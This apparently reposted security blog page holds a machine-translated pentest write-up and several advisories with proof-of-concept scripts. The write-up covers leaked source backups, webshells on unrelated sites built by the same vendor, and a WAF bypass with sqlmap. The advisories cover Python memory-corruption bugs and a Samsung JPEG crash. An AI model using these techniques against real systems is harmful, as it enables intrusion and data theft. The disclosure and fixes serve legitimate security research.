Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153553

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

0x00キーワードを使用して、ターゲットソースコードを取得します

ある朝、私は会社で浸透テストを実施するための一時的な取り決めを受けました。この浸透は主要なドメイン名を与え、サブドメインはありませんでした。ターゲットWebサイトを開いた後、最初に情報を収集しました。1049983-20220106103918120-1949305445.png

ミドルウェア: IIS 8.5 1049983-20220106103918574-542283566.png

管理者を入力して、それが自動的に追加されたことを発見しました/

それはそのディレクトリが存在することを意味しますので、ファイルの波を盲目的に推測する、login.aspx default.aspx main.aspxなど1049983-20220106103919310-1402173741.png

最後に、バックグラウンドログインページはlogin.aspxで見つかりました。これは弱いパスワードの波ではありませんか?

アカウントは、試用操作1049983-20220106103920127-1825260822.pngの後にロックされています

おなじみのスタートは、そうだから、他の方法しか試すことができないからです。

いくつかの情報は、ホームページ1049983-20220106103920974-1940392655.pngのHTMLコードで見つかりました

デザインと制作?次のドメイン名によると、それはウェブサイトの建物会社です

次に、これがポイントです。 IIS8.5+ASP.NET+サイト構築システム

バックアップファイルを最初にスキャンします1049983-20220106103921425-155429375.png

この開発者にとっては、400個以上のIPが問題ありません。 FOFAクエリツールを使用して、バッチ1049983-20220106103921829-1448871529.pngでエクスポートします

次に、バックアップファイルをスキャンします。ここでは、兄弟Bのスキャナー3https://github.com/breken5/webalivescanをお勧めします

バッチサバイバルスキャンとディレクトリスキャンを実行できます1049983-20220106103922341-218058023.png

いくつかのサイトの下にweb.zipバックアップファイルを見つけました。

ダウンロード後、ターゲットサイトファイルが比較されました。基本的に一貫した1049983-20220106103922901-1069820455.png

0x01コードを取得して監査して壁を何度も押し始めます

次に、監査を開始します。1049983-20220106103923815-1139109272.png

インターフェイスWebClient.DownLoadFile(リモートファイルのダウンロード)に敏感な操作を置く

この方法は絶対的なパスを提供する必要があるためです。それは頭痛ですが、関連するパラメーターに従っています。発見する。

この方法は別の方法で呼び出されます。1049983-20220106103924399-1355850887.png

server.mappathで渡されますが、絶対的なパスを見つける必要はありません。システムはあなたのためにそれを手配しました。

次に、POC:を構築します

ashx/api.ashx?m=downloadfilefilepath=asmx.jpgweburl=http://***。CN/1049983-20220106103925555-1905383795.png

アクセスアドレス1049983-20220106103926268-1173007218.png

ファイルが存在し、その後、証明が実現可能になります

ターゲットアドレス1049983-20220106103926962-1035196824.pngに戻ります

ファイルが固定されていません

引き続きコードに戻り、他の脆弱性を監査し、他のインターフェイスに複数の脆弱性があります。たとえば、ueditorリモートクロール脆弱性1049983-20220106103927586-1941905001.png

ファイルの名前変更は揺るがす可能性があります

1049983-20220106103928097-1137720979.png

ただし、これらのインターフェイスにはログイン1049983-20220106103928670-62149113.pngが必要です

これは頭痛であり、ログインを必要としないいくつかのインターフェイスでSQLインジェクションを見つけようとする予定です。

最後に、SQLステッチがどこかで発見されました。1049983-20220106103929492-118196344.png

しかし、ここでは、ISSAFESQLSTRING検出は1049983-20220106103930051-247295581.pngと呼ばれます

一般的なシンボルは基本的に立ち往生しています

0x02開発者を取り、一般アカウントの逆暗号化と復号化アルゴリズムを見つけます

それらはすべて同じWebサイトビルディングプログラムを使用しているため、プログラムに組み込みアカウントがあると疑われています。

それで、私は監査したばかりの抜け穴を渡す準備をしました。同じプログラムサイトから始めます

最後に、特定のサイトでウェブシェルを正常に手に入れました

関連情報1049983-20220106103930560-496241117.pngをご覧ください

これは実際にはメーカーのデモサイトグループであり、開発者のすべてのサイトソースコードが保存されています。

開発プロセス中に多くのデモ環境があるはずであり、すべての顧客がそれらを持っていると推定されています。

サーバーを介してターゲットサイト1049983-20220106103931009-71314533.pngのデモWebサイトにめくりました

ルートディレクトリには、ZIP WebサイトのバックアップとSQLデータベースバックアップがあります。

ターゲットサイトが直接移動された場合、バックエンドアカウントのパスワードは同じでなければなりません。

SQLファイルをダウンロードします。関連情報1049983-20220106103931570-1846651994.pngを検索します

アカウントに挿入されたSQLステートメントが見つかりました。そのパスワードは、1049983-20220106103932232-1921050966.pngで暗号化されています

CMD5のロックを解除できないため、Ciphertextを33ビット暗号化として見ました。

ただし、ログインプロセス中、パスワードはRSA暗号化後に送信されますが、バックエンドは実際には33ビットMD5暗号化です。

ソースコードのため、ログインメソッドを追跡しました。1049983-20220106103933554-2142229781.png

パスワードが渡された後、Commfun.ENPWDが暗号化のために呼び出されます。

ENPWDメソッド1049983-20220106103934086-1207557966.pngの追跡

渡されたパスワードはRSAタイプであり、RSA復号化が最初に実行され、次にDES暗号化が実行されることがわかります。

Desencrypt.Encryptメソッドを追跡します。1049983-20220106103934466-1892231958.png

カプセル化され、暗号化されたキーに渡された暗号化メソッドは次のとおりです。

そのコア暗号化方法は次のとおりです。1049983-20220106103934918-1778582804.png

そして、このカテゴリで。また、復号化方法1049983-20220106103935511-1781289920.pngも定義します

暗号化方法と復号化方法とキーが取得されます。その後、それを引き出して別々に呼び出す必要があります。1049983-20220106103936101-1935894672.png

暗号化された文字を復号化し、結果を取得します1049983-20220106103936660-850388884.png

1049983-20220106103938164-373416304.pngにログインしてみてください

私は長い間一生懸命働いていましたが、それは無駄でした。

0x03暗いヤナギと花がターゲットシェルを獲得します

すでに午後4時です。まだ進歩がなく、SQLフィルタリングをバイパスしようとする準備ができています。

現時点では、SQL注入ポイントが見つかりました。1049983-20220106103938695-190719613.png

メソッドは2つのパラメーターを受信しますが、1つのパラメーターのみをフィルターします。

ターゲットWebサイト1049983-20220106103939091-740130853.pngのクイズ

既存の注入では、WAFがゴミパラメーターで正常に満たされていることがわかりました。

1049983-20220106103939954-426082430.png

sqlmapにアクセスして心の安らぎで実行し、システムアカウントとパスワードを入手してください1049983-20220106103940604-42722927.png

取得した暗号文を復号化して結果を取得します

1049983-20220106103941431-713547984.png

ログインしてみてください。今、そうです!1049983-20220106103941866-739496859.png

ついに来てください!

以前の監査の後、多くのインターフェイスが脆弱性を持っていることがわかっており、今ではログインしていることに成功しています。

ueditorで直接それを奪ってください。1049983-20220106103942350-1890359523.png

シェルが成功しました

0x04要約

1。ターゲットURLの後に管理者に管理バックエンドを表示する管理者に追加し、Webサイトの下部にあるWebサイトのCMS情報を照会します。2。 Webサイトの1つがソースコード圧縮パッケージのリークを持っていることがわかりました。5。Webサイトのソースコードのローカルコード監査を実行し、ASHX/API.ASHXにログインする脆弱性があります。では、SQLインジェクションの脆弱性があり、ログインする必要があり、フィルタリングされます6。 7。WebShellを通じて、サイトグループの各WebサイトのルートディレクトリにZIP WebサイトのバックアップとSQLがあることがわかります。データベースバックアップ、SQLステートメントには、挿入されたユーザー名とパスワードが含まれています(パスワードは33桁です)。サイトグループのすべてのログインは、基本的に同じユーザー名とパスワードを使用します。 8。ソースコード分析により、ログインがRSA+DESを介して暗号化され、暗号化方法とキー値がソースコードで見つかったことがわかりました。 10。ソースコードの暗号化方法を介して復号化方法を記述し、ハッシュ値を復号化しますが、ログインすることは不可能です。11をログインすることは不可能です。ソースコード監査により、別のSQLインジェクションが見つかりました。ここで、WAFはガベージ充填データを介してユーザー名を傍受および注入し、SQLMapを介してユーザー名を実行します。上記の復号化方法を介して、パスワードハッシュ値が復号化され、プレーンテキストパスワードが最終的に取得されます。 12。取得したユーザー名とパスワードを介してシステムにログインし、ueditorエディターのリモートファイルダウンロードを介してターゲットシステムの元のWebshellリンクを取得します:https://xz.aliyun.com/t/8375

HireHackking 
Title: Python 3.3 - 3.5 product_setstate() Out-of-bounds Read
Credit: John Leitch (john@autosectools.com), Bryce Darling (darlingbryce@gmail.com)
Url1: http://autosectools.com/Page/Python-product_setstate-Out-of-bounds-Read
Url2: http://bugs.python.org/issue25021
Resolution: Fixed

Python 3.3 - 3.5 suffer from a vulnerability caused by the behavior of the product_setstate() function. When called, the function loops over the state tuple provided and clamps each given index to a value within a range from 0 up to the max number of pools. Then, it loops over the pools and gets an item from the pool using the previously clamped index value.

However, for the upper bound, the clamping logic is using the number of pools and not the size of the individual pool, which can result in a call to PyTuple_GET_ITEM that uses an index outside of the bounds of the pool:

    for (i=0; i n-1)
            index = n-1;
        lz->indices[i] = index;
    }

    result = PyTuple_New(n);
    if (!result)
        return NULL;
    for (i=0; ipools, i);
        PyObject *element = PyTuple_GET_ITEM(pool, lz->indices[i]);
        Py_INCREF(element);
        PyTuple_SET_ITEM(result, i, element);
    }
    
The invalid result of the PyTyple_GET_ITEM() expression is then passed to Py_INCREF(), which performs a write operation that corrupts memory.

In some applications, it may be possible to exploit this behavior to corrupt sensitive information, crash, or achieve code execution. The out-of-bounds write can be observed by running the following script:

import itertools

p = itertools.product((0,),(0,))
p.__setstate__((0, 1))

Which, depending on the arrangement of memory, may produce an exception such as this:

0:000> g
(ea4.11a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c962 ebx=059e8f80 ecx=00000000 edx=00000000 esi=004af564 edi=05392f78
eip=613211eb esp=004af4d0 ebp=004af4f8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
python35_d!product_setstate+0x13b:
613211eb 8b5108          mov     edx,dword ptr [ecx+8] ds:002b:00000008=????????
0:000> k1
ChildEBP RetAddr  
004af4f8 61553a22 python35_d!product_setstate+0x13b [c:\source\python-3.5.0b3\modules\itertoolsmodule.c @ 2266]

In some cases, EIP corruption may occur:

0:000> r
eax=00000000 ebx=03e0f790 ecx=6d2ad658 edx=00000002 esi=03e0f790 edi=6d0dbb20
eip=00000000 esp=004cf6a0 ebp=004cf6ac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
00000000 ??              ???
0:000> k4
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
004cf69c 6d08a390 0x0
004cf6ac 6d02b688 python35!PyIter_Next+0x10
004cf6c0 6d0dbb6e python35!chain_next+0x58
004cf6d0 6d0a021d python35!wrap_next+0x4e

To fix this issue, it is recommended that product_setstate() be updated to clamp indices within a range from 0 up to the size of the pool in the body of the result tuple building loop.
HireHackking 
Title: Python 2.7 strop.replace() Integer Overflow
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-strop-replace-Integer-Overflow
Url2: http://bugs.python.org/issue24708
Resolution: Fixed

The Python 2.7 strop.replace() method suffers from an integer overflow that can be exploited to write outside the bounds of the string buffer and potentially achieve code execution. The issue can be triggered by performing a large substitution that overflows the arithmetic used in mymemreplace() to calculate the size of the new string:

static char *
mymemreplace(const char *str, Py_ssize_t len,           /* input string */
         const char *pat, Py_ssize_t pat_len,           /* pattern string to find */
         const char *sub, Py_ssize_t sub_len,           /* substitution string */
         Py_ssize_t count,                              /* number of replacements */
         Py_ssize_t *out_len)
{
    [...]

    new_len = len + nfound*(sub_len - pat_len); <<<< Unchecked arithmetic can overflow here.
    if (new_len == 0) {
        /* Have to allocate something for the caller to free(). */
        out_s = (char *)PyMem_MALLOC(1);
        if (out_s == NULL)
            return NULL;
        out_s[0] = '\0';
    }
    else {
        assert(new_len > 0);
        new_s = (char *)PyMem_MALLOC(new_len); <<<< An allocation is performed using overflowed value.
        if (new_s == NULL)
            return NULL;
        out_s = new_s;

        for (; count > 0 && len > 0; --count) { <<<< Memory is copied to new_s using len, which can be greater than the overflowed new_len value.
            /* find index of next instance of pattern */
            offset = mymemfind(str, len, pat, pat_len);
            if (offset == -1)
                break;

            /* copy non matching part of input string */
            memcpy(new_s, str, offset);
            str += offset + pat_len;
            len -= offset + pat_len;

            /* copy substitute into the output string */
            new_s += offset;
            memcpy(new_s, sub, sub_len);
            new_s += sub_len;
        }
        /* copy any remaining values into output string */
        if (len > 0)
            memcpy(new_s, str, len);
    }
    [...]
}

The following script demonstrates the issue:

import strop
strop.replace("\x75"*0xEAAA,"\x75","AA"*0xAAAA)
When run under a debugger, it produces the following exception:

0:000> r
eax=01e4cfd0 ebx=5708fc94 ecx=00003c7a edx=00000000 esi=01e3dde8 edi=57096000
eip=7026ae7a esp=0027fc98 ebp=0027fca0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
MSVCR90!memcpy+0x5a:
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> db edi-0x10
57095ff0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
57096000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
57096060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:000> db esi
01e3dde8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3ddf8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de08  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de18  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de28  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de38  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de48  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
01e3de58  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000> k
ChildEBP RetAddr  
0027fca0 1e056efc MSVCR90!memcpy+0x5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
0027fcd0 1e05700b python27!mymemreplace+0xfc [c:\build27\cpython\modules\stropmodule.c @ 1139]
0027fd18 1e0aaed7 python27!strop_replace+0xbb [c:\build27\cpython\modules\stropmodule.c @ 1185]
0027fd30 1e0edcc0 python27!PyCFunction_Call+0x47 [c:\build27\cpython\objects\methodobject.c @ 81]
0027fd5c 1e0f012a python27!call_function+0x2b0 [c:\build27\cpython\python\ceval.c @ 4035]
0027fdcc 1e0f1100 python27!PyEval_EvalFrameEx+0x239a [c:\build27\cpython\python\ceval.c @ 2684]
0027fe00 1e0f1162 python27!PyEval_EvalCodeEx+0x690 [c:\build27\cpython\python\ceval.c @ 3267]
0027fe2c 1e1170ca python27!PyEval_EvalCode+0x22 [c:\build27\cpython\python\ceval.c @ 674]
0027fe44 1e118215 python27!run_mod+0x2a [c:\build27\cpython\python\pythonrun.c @ 1371]
0027fe64 1e1187b0 python27!PyRun_FileExFlags+0x75 [c:\build27\cpython\python\pythonrun.c @ 1358]
0027fea4 1e119129 python27!PyRun_SimpleFileExFlags+0x190 [c:\build27\cpython\python\pythonrun.c @ 950]
0027fec0 1e038cb5 python27!PyRun_AnyFileExFlags+0x59 [c:\build27\cpython\python\pythonrun.c @ 753]
0027ff3c 1d00116d python27!Py_Main+0x965 [c:\build27\cpython\modules\main.c @ 643]
0027ff80 74b97c04 python!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 586]
0027ff94 7701ad1f KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7701acea ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> !analyze -v -nodb
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
MSVCR90!memcpy+5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7026ae7a (MSVCR90!memcpy+0x0000005a)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 57096000
Attempt to write to address 57096000

CONTEXT:  00000000 -- (.cxr 0x0;r)
eax=01e4cfd0 ebx=5708fc94 ecx=00003c7a edx=00000000 esi=01e3dde8 edi=57096000
eip=7026ae7a esp=0027fc98 ebp=0027fca0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
MSVCR90!memcpy+0x5a:
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

FAULTING_THREAD:  00001408

PROCESS_NAME:  python.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  57096000

WRITE_ADDRESS:  57096000 

FOLLOWUP_IP: 
MSVCR90!memcpy+5a [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 188]
7026ae7a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

NTGLOBALFLAG:  470

APPLICATION_VERIFIER_FLAGS:  0

APP:  python.exe

ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre

BUGCHECK_STR:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_FILL_PATTERN_NXCODE

PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE_FILL_PATTERN_NXCODE

DEFAULT_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_NXCODE

LAST_CONTROL_TRANSFER:  from 1e056efc to 7026ae7a

STACK_TEXT:  
0027fca0 1e056efc 5708fc94 01e37a7c 00015554 MSVCR90!memcpy+0x5a
0027fcd0 1e05700b 01e2ba4e 38e171c8 01d244cc python27!mymemreplace+0xfc
0027fd18 1e0aaed7 00000000 01cebe40 01de2c38 python27!strop_replace+0xbb
0027fd30 1e0edcc0 01de2c38 01cebe40 00000000 python27!PyCFunction_Call+0x47
0027fd5c 1e0f012a 0027fdb4 01ce6c80 01ce6c80 python27!call_function+0x2b0
0027fdcc 1e0f1100 01ddd9d0 00000000 01ce6c80 python27!PyEval_EvalFrameEx+0x239a
0027fe00 1e0f1162 01ce6c80 01ddd9d0 01ceaa50 python27!PyEval_EvalCodeEx+0x690
0027fe2c 1e1170ca 01ce6c80 01ceaa50 01ceaa50 python27!PyEval_EvalCode+0x22
0027fe44 1e118215 01dca090 01ceaa50 01ceaa50 python27!run_mod+0x2a
0027fe64 1e1187b0 702c7408 00342ebb 00000101 python27!PyRun_FileExFlags+0x75
0027fea4 1e119129 702c7408 00342ebb 00000001 python27!PyRun_SimpleFileExFlags+0x190
0027fec0 1e038cb5 702c7408 00342ebb 00000001 python27!PyRun_AnyFileExFlags+0x59
0027ff3c 1d00116d 00000002 00342e98 00341950 python27!Py_Main+0x965
0027ff80 74b97c04 7ffde000 74b97be0 b4e726fd python!__tmainCRTStartup+0x10f
0027ff94 7701ad1f 7ffde000 b723218a 00000000 KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7701acea ffffffff 77000212 00000000 ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 1d001314 7ffde000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  .cxr 0x0 ; kb

FAULTING_SOURCE_LINE:  f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm

FAULTING_SOURCE_FILE:  f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm

FAULTING_SOURCE_LINE_NUMBER:  188

FAULTING_SOURCE_CODE:  
No source found for 'f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm'


SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  msvcr90!memcpy+5a

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: MSVCR90

IMAGE_NAME:  MSVCR90.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  51ea24a5

FAILURE_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_NXCODE_c0000005_MSVCR90.dll!memcpy

BUCKET_ID:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_FILL_PATTERN_NXCODE_msvcr90!memcpy+5a

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:string_dereference_fill_pattern_nxcode_c0000005_msvcr90.dll!memcpy

FAILURE_ID_HASH:  {031149d8-0626-9042-d8b7-a1766b1c5514}

Followup: MachineOwner
---------

To fix the issue, mymemreplace should validate that the computed value new_len has not overflowed. To do this, (new_len - len) / nfound should be compared to sub_len - pat_len. If that are not equal, an overflow has occurred.
HireHackking 
Title: Python 2.7 array.fromstring Use After Free
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-array-fromstring-Use-After-Free
Url2: http://bugs.python.org/issue24613
Resolution: Fixed

The Python 2.7 array.fromstring() method suffers from a use after free caused by unsafe realloc use. The issue is triggered when an array is concatenated to itself via fromstring() call:

static PyObject *
array_fromstring(arrayobject *self, PyObject *args)
{
    char *str;
    Py_ssize_t n;
    int itemsize = self->ob_descr->itemsize;
    if (!PyArg_ParseTuple(args, "s#:fromstring", &str, &n)) <<<< The str buffer is parsed from args. In cases where an array is passed to itself, self->ob_item == str.
        return NULL;
    if (n % itemsize != 0) {
        PyErr_SetString(PyExc_ValueError,
                   "string length not a multiple of item size");
        return NULL;
    }
    n = n / itemsize;
    if (n > 0) {
        char *item = self->ob_item; <<<< If str == self->ob_item, item == str.
        if ((n > PY_SSIZE_T_MAX - Py_SIZE(self)) ||
            ((Py_SIZE(self) + n) > PY_SSIZE_T_MAX / itemsize)) {
                return PyErr_NoMemory();
        }
        PyMem_RESIZE(item, char, (Py_SIZE(self) + n) * itemsize); <<<< A realloc call occurs here with item passed as the ptr argument. Because realloc sometimes calls free(), this means that item may be freed. If item was equal to str, str is now pointing to freed memory.
        if (item == NULL) {
            PyErr_NoMemory();
            return NULL;
        }
        self->ob_item = item;
        Py_SIZE(self) += n;
        self->allocated = Py_SIZE(self);
        memcpy(item + (Py_SIZE(self) - n) * itemsize,
               str, itemsize*n); <<<< If str is dangling at this point, a use after free occurs here.
    }
    Py_INCREF(Py_None);
    return Py_None;
}

In most cases when this occurs, the function behaves as expected; while the dangling str pointer is technically pointing to deallocated memory, given the timing it is highly likely the memory contains the expected data. However, ocassionally, an errant allocation will occur between the realloc and memcpy, leading to unexpected contents in the str buffer.

In applications that expose otherwise innocuous indirect object control of arrays as attack surface, it may be possible for an attacker to trigger the corruption of arrays. This could potentially be exploited to exfiltrate data or achieve privilege escalation, depending on subsequent operations performed using corrupted arrays.

A proof-of-concept follows:

import array
import sys
import random

testNumber = 0

def dump(value):
    global testNumber
    i = 0
    for x in value:
        y = ord(x)
        if (y != 0x41): 
            end = ''.join(value[i:]).index('A' * 0x10)
            sys.stdout.write("%08x a[%08x]: " % (testNumber, i))
            for z in value[i:i+end]: sys.stdout.write(hex(ord(z))[2:])
            sys.stdout.write('\r\n')
            break            
        i += 1

def copyArray():
    global testNumber
    while True:
        a=array.array("c",'A'*random.randint(0x0, 0x10000))
        a.fromstring(a)
        dump(a)
        testNumber += 1
    
print "Starting..."    
copyArray()

The script repeatedly creates randomly sized arrays filled with 0x41, then calls fromstring() and checks the array for corruption. If any is found, the relevant bytes are written to the console as hex. The output should look something like this:

Starting...
00000007 a[00000cdc]: c8684d0b0f54c0
0000001d a[0000f84d]: b03f4f0b8be620
00000027 a[0000119f]: 50724d0b0f54c0
0000004c a[00000e53]: b86b4d0b0f54c0
0000005a a[000001e1]: d8ab4609040620
00000090 a[0000015b]: 9040620104e5f0
0000014d a[000002d6]: 10ec620d8ab460
00000153 a[000000f7]: 9040620104e5f0
0000023c a[00000186]: 50d34c0f8b65a0
00000279 a[000001c3]: d8ab4609040620
000002ee a[00000133]: 9040620104e5f0
000002ff a[00000154]: 9040620104e5f0
0000030f a[00000278]: 10ec620d8ab460
00000368 a[00000181]: 50d34c0f8b65a0
000003b2 a[0000005a]: d0de5f0d05e5f0
000003b5 a[0000021c]: b854d00d3620
00000431 a[000001d8]: d8ab4609040620
0000044b a[000002db]: 10ec620d8ab460
00000461 a[000000de]: 9040620104e5f0
000004fb a[0000232f]: 10f74d0c0ce620
00000510 a[0000014a]: 9040620104e5f0

In some applications, such as those that are web-based, similar circumstances may manifest that would allow for remote exploitation.

To fix the issue, array_fromstring should check if self->ob_item is pointing to the same memory as str, and handle the copy accordingly.
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=495

The attached JPEG file causes memory corruption the DCMProvider service when the file is processed by the media scanner, leading to the following crash:

quaramip.jpg:

I/DEBUG   ( 2962): pid: 19350, tid: 19468, name: HEAVY#0  >>> com.samsung.dcm:DCMService <<<
I/DEBUG   ( 2962): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x8080808080808080
I/DEBUG   ( 2962):     x0   0000007f97afd000  x1   0000007f98118650  x2   0000007f9811eaa8  x3   0000007f9815a430
I/DEBUG   ( 2962):     x4   8080808080808080  x5   0000007f9811eaa8  x6   0000000000000000  x7   0000000000000003
I/DEBUG   ( 2962):     x8   0000000000000050  x9   0000000000000005  x10  0000000000000053  x11  0000007f9815a470
I/DEBUG   ( 2962):     x12  0000007f97803920  x13  0000007f978ff050  x14  0000007f983fea40  x15  0000000000000001
I/DEBUG   ( 2962):     x16  0000007faabefae0  x17  0000007faf708880  x18  0000007faf77da40  x19  0000007f97afd000
I/DEBUG   ( 2962):     x20  00000000ffffffff  x21  0000000000000001  x22  0000007f9815a410  x23  0000007f981588f0
I/DEBUG   ( 2962):     x24  0000007f983feb44  x25  0000007f983feb48  x26  ffffffffffffffe8  x27  0000007f98118600
I/DEBUG   ( 2962):     x28  0000007f98177800  x29  000000000000001c  x30  0000007faabb8ff8
I/DEBUG   ( 2962):     sp   0000007f983fea50  pc   8080808080808080  pstate 0000000000000000
I/DEBUG   ( 2962): 
I/DEBUG   ( 2962): backtrace:
I/DEBUG   ( 2962):     #00 pc 8080808080808080  <unknown>
I/DEBUG   ( 2962):     #01 pc 00000000000000a6  <unknown>

quaramfree.jpg:

I/DEBUG   ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x808080808000d0
I/DEBUG   ( 2956):     x0   0000000000008080  x1   0000007f89d03720  x2   00000000000fffff  x3   8080808080800000
I/DEBUG   ( 2956):     x4   0000000000000008  x5   0000007f89cf2000  x6   0000007f89d03758  x7   0000000000000002
I/DEBUG   ( 2956):     x8   0000000000000006  x9   0000000000000012  x10  8080808080800090  x11  0000007f803015d8
I/DEBUG   ( 2956):     x12  0000000000000013  x13  0000007f89cf2000  x14  0000007f89d00000  x15  00000000000014a4
I/DEBUG   ( 2956):     x16  0000007f850eec00  x17  0000007f89c4e17c  x18  0000007f89d037f8  x19  8080808080808080
I/DEBUG   ( 2956):     x20  0000007f8031e618  x21  0000007f89cf2000  x22  0000000000000001  x23  0000007f803166d8
I/DEBUG   ( 2956):     x24  0000007f80331170  x25  0000000000000010  x26  00000000000001f4  x27  fffffffffffffffc
I/DEBUG   ( 2956):     x28  000000000000007d  x29  0000007f84efea60  x30  0000007f89c4e194
I/DEBUG   ( 2956):     sp   0000007f84efea60  pc   0000007f89cae0b4  pstate 0000000020000000
I/DEBUG   ( 2956): 
I/DEBUG   ( 2956): backtrace:
I/DEBUG   ( 2956):     #00 pc 00000000000790b4  /system/lib64/libc.so (je_free+92)
I/DEBUG   ( 2956):     #01 pc 0000000000019190  /system/lib64/libc.so (free+20)
I/DEBUG   ( 2956):     #02 pc 000000000003e8a0  /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+1076)
I/DEBUG   ( 2956):     #03 pc 00000000000427b0  /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2904)
I/DEBUG   ( 2956):     #04 pc 00000000000428d4  /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG   ( 2956):     #05 pc 0000000000042a08  /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG   ( 2956):     #06 pc 000000000004420c  /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG   ( 2956):     #07 pc 00000000000a4234  /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG   ( 2956):     #08 pc 0000000000001b98  /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG   ( 2956):     #09 pc 0000000000001418  /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG   ( 2956):     #10 pc 00000000000018ec  /system/framework/arm64/saiv.odex

